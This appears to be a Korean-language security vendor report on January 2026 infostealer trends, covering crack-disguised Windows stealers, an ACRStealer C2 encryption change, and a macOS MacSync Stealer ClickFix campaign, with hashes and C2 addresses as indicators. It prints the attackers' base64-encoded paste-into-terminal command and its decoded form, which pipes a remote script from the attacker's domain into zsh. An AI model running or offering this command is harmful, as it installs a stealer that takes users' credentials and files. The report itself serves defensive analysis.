2026년 1월 인포스틸러 동향 보고서
본 보고서는 2026년 1월 한 달 동안 수집 및 분석된 인포스틸러 악성코드에 대한 유포 수량, 유포 수단, 위장 기법 등에 대한 통계와 동향 및 사례 정보를 제공한다. 아래는 보고서 원문 내용에 대한 요약이다.
1) 데이터 출처 및 수집 방법
ASEC(AhnLab SEcurity intelligence Center)에서는 인포스틸러 악성코드를 선제 대응하기 위해, 유포 중인 악성코드를 자동으로 수집할 수 있는 다양한 시스템을 운영하고 있다. 수집된 악성코드는 자동 분석 시스템을 통해 악성 여부와 C2 정보가 분석된다. 관련 정보는 ATIP IOC 서비스로 실시간 제공되며, ATIP 파일 분석 정보 페이지의 연관 정보에서도 확인할 수 있다.
AhnLab 자체 구축 시스템
- 크랙 위장 악성코드 자동 수집 시스템
- 이메일 허니팟 시스템
- 악성코드 C2 자동 분석 시스템
ATIP 실시간 IOC 서비스
C2 및 악성코드 유형 분석 정보
- 파일 분석 정보 – 연관 정보 – Contacted URLs
본 보고서의 통계는 전반적인 인포스틸러 악성코드의 유포 수량, 위장 기법, 유포 방식의 추이를 확인하는 용도로 활용할 것을 제안한다.
2) 크랙 위장 유포 인포스틸러
크랙(Crack) 및 키젠(Keygen) 등의 불법 프로그램으로 위장하여 유포 중인 정보 탈취 악성코드에 대한 통계이다. 악성코드 유포 게시글이 검색 엔진의 검색 결과에서 상위에 노출되도록 하는 전략(SEO Poisoning)을 사용하여 유포된다. ASEC에서는 이러한 방식으로 유포되는 악성코드를 자동으로 수집하고 C2 정보를 분석하는 시스템을 구축하여 실시간으로 악성코드의 C2를 차단하고, ATIP를 통해 관련 정보를 제공하고 있다. 1월에는 LummaC2, Vidar, ACRStealer 인포스틸러가 주로 유포되었다.
그림 1. 악성코드 유포 페이지
지난 1년 동안 이러한 방식으로 유포된 악성코드 수량은 다음 차트와 같다. 두 번째 범례는 악성코드 수집 당시 VirusTotal에 관련 정보가 존재하지 않았던, 즉 AhnLab에서 더 빠르게 수집한 악성코드 수량을 의미한다. 자동 수집 시스템을 통해 대다수의 악성코드를 먼저 수집하고 대응한 것을 알 수 있다.
차트 1. 연간 악성코드 유포 수량
기존에는 공격자가 직접 제작한 블로그에 악성코드 유포 게시글을 작성했지만, 검색 엔진이 이러한 악성 블로그를 검색 결과에 노출하지 않도록 조치하기 시작했다. 공격자는 이를 우회하기 위해 정상 사이트에 게시글을 작성하는 방식으로 악성코드를 유포한다. 유명 포럼이나 특정 기업의 Q&A 페이지, 자유게시판, 댓글 등을 활용하고 있으며, 아래 그림은 이에 대한 예시로 각종 사이트에 업로드되어 있는 악성코드 유포 게시글이다. 이러한 방식으로 업로드된 게시글은 검색 엔진의 검색 결과에서 상위에 노출되어 다수의 사용자가 방문할 수 있게 된다. 최근에는 관리가 부실한 워드프레스 사이트를 공격하여 유포 게시글을 작성하는 경우가 많아지고 있다.
그림 2. 커뮤니티에 게시된 유포 게시글
그림 3. 기업 홈페이지에 게시된 유포 게시글
위와 같이 유포되는 인포스틸러의 실행 유형에는 EXE 형식으로 유포되는 유형과, 정상 EXE 파일과 악성 DLL 파일을 동일한 폴더에 위치시켜, 정상 EXE 파일 실행 시 악성 DLL 파일이 로드되는 DLL SideLoading 기법을 사용하는 유형이 있다. 1월 한 달 동안 발생한 악성코드는 EXE 유형 약 70.8%, DLL Sideloading 유형 약 29.2%의 비율이며, 지난달에 비해 DLL Sideloading 방식의 비율이 소폭 감소하였다. DLL SideLoading 유형의 악성코드는 원본 정상 DLL에서 일부분만 악성 코드로 변경하는 방식으로 제작되므로 정상 원본과 외형적 차이가 크지 않아 타 보안 제품에서는 정상 파일로 분류하는 사례가 많기 때문에 주의가 필요하다.
윈도우 환경에서는 위와 같은 유형의 윈도우용 인포스틸러를 유포하지만 macOS 환경에서 유포 페이지에 접속할 경우 macOS용 인포스틸러를 유포한다. macOS 유포에서는 주로 악성 명령어를 복사하여 터미널을 통한 실행을 유도하는 ClickFix 기법을 사용하거나, 악성 Bash 스크립트를 다운로드해 실행하도록 유도하는 방식으로 인포스틸러를 유포한다. 최종적으로 실행되는 인포스틸러는 Fatbin 실행 파일 유형 또는 osascript로 구현된 유형의 인포스틸러가 주로 유포되고 있다. 윈도우 유포와는 다르게 샘플 변형 속도가 매우 빠른 특징을 가진다. 동일한 기능을 하지만, 분 단위 또는 시간 단위로 악성코드의 해시 값이 변경된다.
그림 4. macOS 인포스틸러 유포 페이지 예시
최근 6개월간의 macOS 인포스틸러 수집 현황은 아래와 같다. 1월에는 Bash 스크립트 268개, Fatbin 실행파일 12개가 수집되었으며, C2 도메인 27개가 수집되었다.
차트 2.mac 인포스틸러 수집 통계
동향 #1
– ACRStealer의 변형 발생
1월 말, ACRStealer의 C2 통신 기능에서 큰 변형이 발생했다. 기존에는 C2 송·수신 데이터를 암호화할 때 악성코드 내부에 하드코딩된 키와 AES 알고리즘을 사용했으나, 1월 말부터 유포되는 악성코드에서는 ECDH, ChaCha20-Poly1305 알고리즘을 사용한다. 이를 위해 C2 접속 과정에서 상호 간의 공개키 교환 과정이 추가되었다.
악성코드 실행 시 SECP256R1 곡선을 활용하여 키 쌍을 생성한 뒤 공개키를 C2로 전송한다. 이때 C2는 자신의 공개키를 응답한다. 이후 악성코드는 C2가 응답한 공개키와 자신의 개인키를 조합하여 공유 비밀을 생성하는데, 해당 값을 암호화 키로 사용한다. 이후 C2 통신 시에는 해당 키와 ChaCha20-Poly1305 알고리즘을 통해 암호화한 데이터를 주고받는다.
악성코드에서 키 쌍 생성 과정에서 PEB 데이터를 시드값으로 사용한다. 따라서 동일 환경에서도 실행할 때마다 다른 키를 생성하게 된다. 이로 인해 C2는 해당 실행 세션을 정확히 식별해야 데이터를 복호화할 수 있다. 이를 위해 “X-Requests-Key” 헤더가 추가된 것으로 보인다. 해당 헤더 값은 키 교환 과정에서 C2에서 발급하며, 이후 악성코드는 C2 접속 시 해당 헤더 정보를 포함한다.
그림 5. C2 해더 생성 코드 (좌:기존 우:변형)
-
해시
7a5c704e85df3dec08c9ab17857c4ac1
3337c23f43616d2736653963de7f91f2 -
C2
hxxps://146.103.102[.]11
hxxps://94.103.95[.]97
동향 #2
– macOS 유포 인포스틸러
본 동향보고서부터는 macOS 인포스틸러 동향에 대한 내용이 추가되어, 이와 관련된 MacSync Stealer 유포 사례를 소개하고자 한다. 인포스틸러 유포 과정에서 브라우저의 User-Agent를 검사하여 macOS 사용이 확인될 경우 macOS 인포스틸러를 유포하는 페이지로 리디렉션된다. 해당 페이지는 GitHub로 위장하고 있으며, 입력 상자의 내용을 복사하여 터미널에 붙여 넣은 뒤 실행하도록 유도하는 내용으로 구성되어 있다.
그림 6. macOS 인포스틸러 유포 페이지
악성 명령어의 내용은 아래와 같으며, 위장 행위를 목적으로 정상 DMG 파일을 다운로드한 뒤 Base64 인코딩된 명령을 zsh로 실행한다. 결과적으로 C2에서 추가 스크립트 파일을 다운로드하여 실행하는 명령이다.
| 원본 명령어 |
|---|
| echo “GitHub-AppInstaller: https://dl.github[.]com/drive-file-stream/GitHubApplicationSetup.dmg” && echo ‘ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlcyBwbGVhc2Ugd2FpdC4uLicgJiYgY3VybCAta2ZzU0wgaHR0cDovL3Nlc3RyYWluaW5nLmNvbS9jdXJsLzBiYTQ0ZDY0OTYzNzY1ZmI2NGRiNmE4ZjJmODBkZWViODczNWIyNGFiOTg4ZWZmMjI2NjhhMzhiZTgxZWI0YmV8enNo’|base64 -D|zsh |
| 디코딩 명령어 |
|---|
| echo ‘Installing packages please wait…’ && curl -kfsSL http://sestraining[.]com/curl/0ba44d64963765fb64db6a8f2f80deeb8735b24ab988eff22668a38be81eb4be|zsh |
다운로드된 스크립트 파일은 Base64 인코딩된 데이터를 gzip으로 압축 해제한 뒤 실행하는 명령으로 구성되어 있다. 최종적으로 실행되는 스크립트는 아래와 같다.
그림 7. Macsync Stealer 다운로더
해당 스크립트는 C2에 접속하여 osascript 파일을 다운로드해 실행한 후, 그 결과로 생성된 파일을 C2로 전송하는 기능을 수행한다. 이때 실행되는 osascript는 MacSync Stealer로, 실행 시 시스템의 중요한 정보를 수집하여 “/tmp/osalogging.zip” 경로에 압축 파일을 생성한다. 수집된 정보는 해당 스크립트를 실행한 스크립트에 의해 C2로 전송된다. C2 접속 시에는 token 값과 api_key 값을 사용하며, 값이 유효하지 않을 경우 C2는 동작하지 않는다.
- C2 도메인: sestraining.com
- 해시
73600d113646a95d2e459dd940c18e1e (스크립트)
74e17b926dc6cc5ab247aa0e059916c1 (디코딩 스크립트)
4aab18983ab8c00f3c619b75033ce548 (MacSync Stealer)
본 요약문에 언급되지 않은 통계에 대한 설명, 악성코드 제작에 사용된 위장 대상 기업 통계와 원본 파일명 통계, 유포지 통계, 제품 탐지 수량 통계, 피싱 이메일에 의한 인포스틸러 관련 정보 등의 자세한 내용은 ATIP 보고서 원문을 통해 확인할 수 있다.
